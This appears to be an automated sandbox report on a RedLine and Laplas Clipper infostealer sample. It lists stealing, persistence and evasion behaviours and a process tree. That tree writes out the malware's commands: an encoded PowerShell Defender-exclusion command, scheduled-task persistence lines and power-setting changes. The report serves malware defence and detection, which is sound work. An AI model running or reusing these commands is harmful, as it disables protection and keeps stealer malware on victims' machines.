Malware Analysis Report

2024-10-23 15:43

Sample ID: 230725-qhnewacf47
Target: raid macro3.rec
SHA256: a0a24efa02d4462fc7bbe2e322b4c82e4ff1f9e4194a0a86eea566302bec2021
Tags: laplas redline @ljagyxa clipper discovery infostealer persistence spyware stealer
Score: 10/10

Analysis Overview

Threat Level: Known bad

The file raid macro3.rec was found to be: Known bad.

Malicious Activity Summary

laplas redline @ljagyxa clipper discovery infostealer persistence spyware stealer

Laplas Clipper

RedLine

Downloads MZ/PE file

Executes dropped EXE

Loads dropped DLL

Reads user/profile data of web browsers

Registers COM server for autorun

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops file in Program Files directory

Enumerates physical storage devices

NTFS ADS

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

GoLang User-Agent

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Modifies registry class

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Creates scheduled task(s)

Checks processor information in registry

Suspicious use of SendNotifyMessage

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2023-07-25 13:15

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2023-07-25 13:15
Reported: 2023-07-25 13:23
Platform: win10-20230703-en
Max time kernel: 444s
Max time network: 443s

Command Line

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\raid macro3.rec"

Signatures

Laplas Clipper

stealer clipper laplas

RedLine

infostealer redline

Downloads MZ/PE file

Reads user/profile data of web browsers

spyware stealer

Registers COM server for autorun

persistence
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" C:\Users\Admin\AppData\Local\Temp\svchost.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip32.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\ = "7-Zip Shell Extension" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ThreadingModel = "Apartment" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000_Classes\Local Settings C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3229013990-3330391637-2814184332-1000_Classes\Local Settings C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32 C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\DragDropHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\7-Zip C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000} C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{23170F69-40C1-278A-1000-000100020000}\InprocServer32\ = "C:\\Program Files\\7-Zip\\7-zip.dll" C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\7-Zip\ = "{23170F69-40C1-278A-1000-000100020000}" C:\Users\Admin\Downloads\7z2301-x64.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\Downloads\script.rar:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
File created C:\Users\Admin\Downloads\7z2301-x64.exe:Zone.Identifier C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\Downloads\script\script.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\Mozilla Firefox\firefox.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\7z2301-x64.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: 35 N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeSecurityPrivilege N/A C:\Program Files\7-Zip\7zG.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Downloads\script\script.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\7z.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: 35 N/A C:\Windows\System32\Conhost.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\main\Installer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4684 wrote to memory of 4144 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 4744 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3140 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe
PID 4144 wrote to memory of 3940 N/A C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\firefox.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Program Files\VideoLAN\VLC\vlc.exe

"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\AppData\Local\Temp\raid macro3.rec"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe"

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.0.269596496\400488784" -parentBuildID 20221007134813 -prefsHandle 1732 -prefMapHandle 1724 -prefsLen 20936 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1e7514f3-0a74-4baf-bbee-77021640ec0d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 1812 238528d5458 gpu

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.1.1200488976\555917829" -parentBuildID 20221007134813 -prefsHandle 2156 -prefMapHandle 2152 -prefsLen 21017 -prefMapSize 232675 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f4ef632-b6fd-4f9c-b836-35735f74ae12} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 2168 23847672858 socket

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.2.1940952481\870191388" -childID 1 -isForBrowser -prefsHandle 2884 -prefMapHandle 2900 -prefsLen 21120 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8e8397f2-f0c4-466b-9798-a6d1a9e673aa} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 2872 238569dab58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.3.1497963375\1772696126" -childID 2 -isForBrowser -prefsHandle 2780 -prefMapHandle 3112 -prefsLen 26480 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {cf266881-0160-49d6-b41b-c6d08872a10c} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 3540 2384766ae58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.4.62216990\50109511" -childID 3 -isForBrowser -prefsHandle 4328 -prefMapHandle 4320 -prefsLen 26539 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {7f138c98-9c71-4d1b-92fb-36b13d592df9} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4340 23858a7da58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.5.381186738\181415041" -childID 4 -isForBrowser -prefsHandle 4944 -prefMapHandle 4912 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9efae3e7-0dcb-4f57-89e7-4933bef3098f} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4968 23858ed5e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.6.1526742387\1380066309" -childID 5 -isForBrowser -prefsHandle 5104 -prefMapHandle 5108 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {40907346-ec57-480e-b94f-32f8952b5f0d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5092 23858ed5b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.7.1352111730\507516753" -childID 6 -isForBrowser -prefsHandle 5368 -prefMapHandle 5372 -prefsLen 26620 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {137fdb02-b72c-410e-935c-f686d081bbff} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5360 23858ed6458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.8.46948688\751609490" -childID 7 -isForBrowser -prefsHandle 5684 -prefMapHandle 7588 -prefsLen 26964 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5ca92268-ad25-4bda-a7c4-b7b204534f26} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5880 23852bb1158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.9.1167411704\1051564531" -childID 8 -isForBrowser -prefsHandle 9608 -prefMapHandle 7512 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9ef4f47a-e5a0-410d-8f53-d52cbd8afc01} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9660 2385b2f8e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.12.602268020\1415154968" -childID 11 -isForBrowser -prefsHandle 9576 -prefMapHandle 9572 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {346bd408-2372-480e-9ecb-0e66f3fab29d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 9588 2385b94e458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.11.1629046242\1900873324" -childID 10 -isForBrowser -prefsHandle 5264 -prefMapHandle 5268 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8f2f427d-6c20-4666-9902-86b6dd2be0f8} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5928 23859cd6b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.10.77539297\340454085" -childID 9 -isForBrowser -prefsHandle 5400 -prefMapHandle 9708 -prefsLen 27139 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {1eb4124e-2f90-4a52-96b8-439f5addfe7e} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7288 23859cd3b58 tab

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding

C:\Windows\System32\fontview.exe

"C:\Windows\System32\fontview.exe" C:\Users\Admin\Downloads\BackupResume.ttc

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.13.663085724\2045944842" -childID 12 -isForBrowser -prefsHandle 7316 -prefMapHandle 5192 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {51d76c98-2750-4439-8f37-d8226b7002d0} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7084 238585c6258 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.14.31080208\218512396" -parentBuildID 20221007134813 -prefsHandle 5832 -prefMapHandle 5844 -prefsLen 27331 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c84df9a5-c3a8-411d-84c1-7efe1fd0e33e} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 4524 2385ac3ce58 rdd

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.15.1474240222\1777299193" -childID 13 -isForBrowser -prefsHandle 6860 -prefMapHandle 6864 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {273b4a3d-eb81-4975-9258-c09c6cdfdb86} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6848 2385a8f2158 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.16.2137646680\355959901" -childID 14 -isForBrowser -prefsHandle 7492 -prefMapHandle 7172 -prefsLen 27331 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {27d6cd96-9acc-48d5-b346-0e76ddb584ad} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7352 23856946b58 tab

C:\Users\Admin\Downloads\7z2301-x64.exe

"C:\Users\Admin\Downloads\7z2301-x64.exe"

C:\Program Files\7-Zip\7zG.exe

"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\script\" -ad -an -ai#7zMap9224:74:7zEvent10764

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

"C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Users\Admin\AppData\Local\Temp\conhost.exe

"C:\Users\Admin\AppData\Local\Temp\conhost.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p7366415912571278752813224456 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_7.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_6.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\Installer.exe

"Installer.exe"

C:\Windows\system32\attrib.exe

attrib +H "Installer.exe"

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /C powershell -EncodedCommand "PAAjADEAbQAyAEEAeABSAGwAUgBjADgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAMgAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AQgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAFcAdAAxADEASAAjAD4A" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjADEAbQAyAEEAeABSAGwAUgBjADgAdAAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjADcAMgAzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAG0AQgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBLAFcAdAAxADEASAAjAD4A"

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6312" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\cmd.exe

"cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Windows\SysWOW64\schtasks.exe

SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk6312" /TR "C:\ProgramData\Dllhost\dllhost.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Users\Admin\Downloads\script\script.exe

"C:\Users\Admin\Downloads\script\script.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.17.149320452\431994016" -childID 15 -isForBrowser -prefsHandle 7084 -prefMapHandle 7092 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07c8f60b-5a96-4fdf-bb1c-52c0693621cd} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 5856 23853c57558 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.18.287542698\1867666559" -childID 16 -isForBrowser -prefsHandle 6928 -prefMapHandle 9584 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5dcf6c6d-c5f0-4939-88ba-4c7265995520} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7072 23853988b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.20.1021561729\1820366478" -childID 18 -isForBrowser -prefsHandle 6692 -prefMapHandle 6716 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {65738230-3750-47a0-9684-4795dc490d71} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6684 2385a497e58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.19.1117803994\1963684542" -childID 17 -isForBrowser -prefsHandle 6592 -prefMapHandle 6852 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e2c87520-0973-4fdb-a80c-ccb2f6bc7f47} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7096 23852bc5458 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.21.410543759\292343130" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 5236 -prefMapHandle 5260 -prefsLen 27362 -prefMapSize 232675 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca3165e-8843-46c3-b321-7e76fb03e76f} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 6960 2385aa2d458 utility

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.22.898733133\1282317683" -childID 19 -isForBrowser -prefsHandle 6396 -prefMapHandle 7588 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8baa9990-6cf0-4c89-86b6-e298df8de81c} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 7400 2385ae09958 tab

C:\Program Files\Mozilla Firefox\firefox.exe

"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4144.23.212465948\1188925951" -childID 20 -isForBrowser -prefsHandle 3748 -prefMapHandle 9176 -prefsLen 27362 -prefMapSize 232675 -jsInitHandle 1336 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {634de901-fac5-4acf-99d5-66b6ac98744d} 4144 "\\.\pipe\gecko-crash-server-pipe.4144" 3736 23852bb0b58 tab

C:\Program Files\Mozilla Firefox\firefox.exe

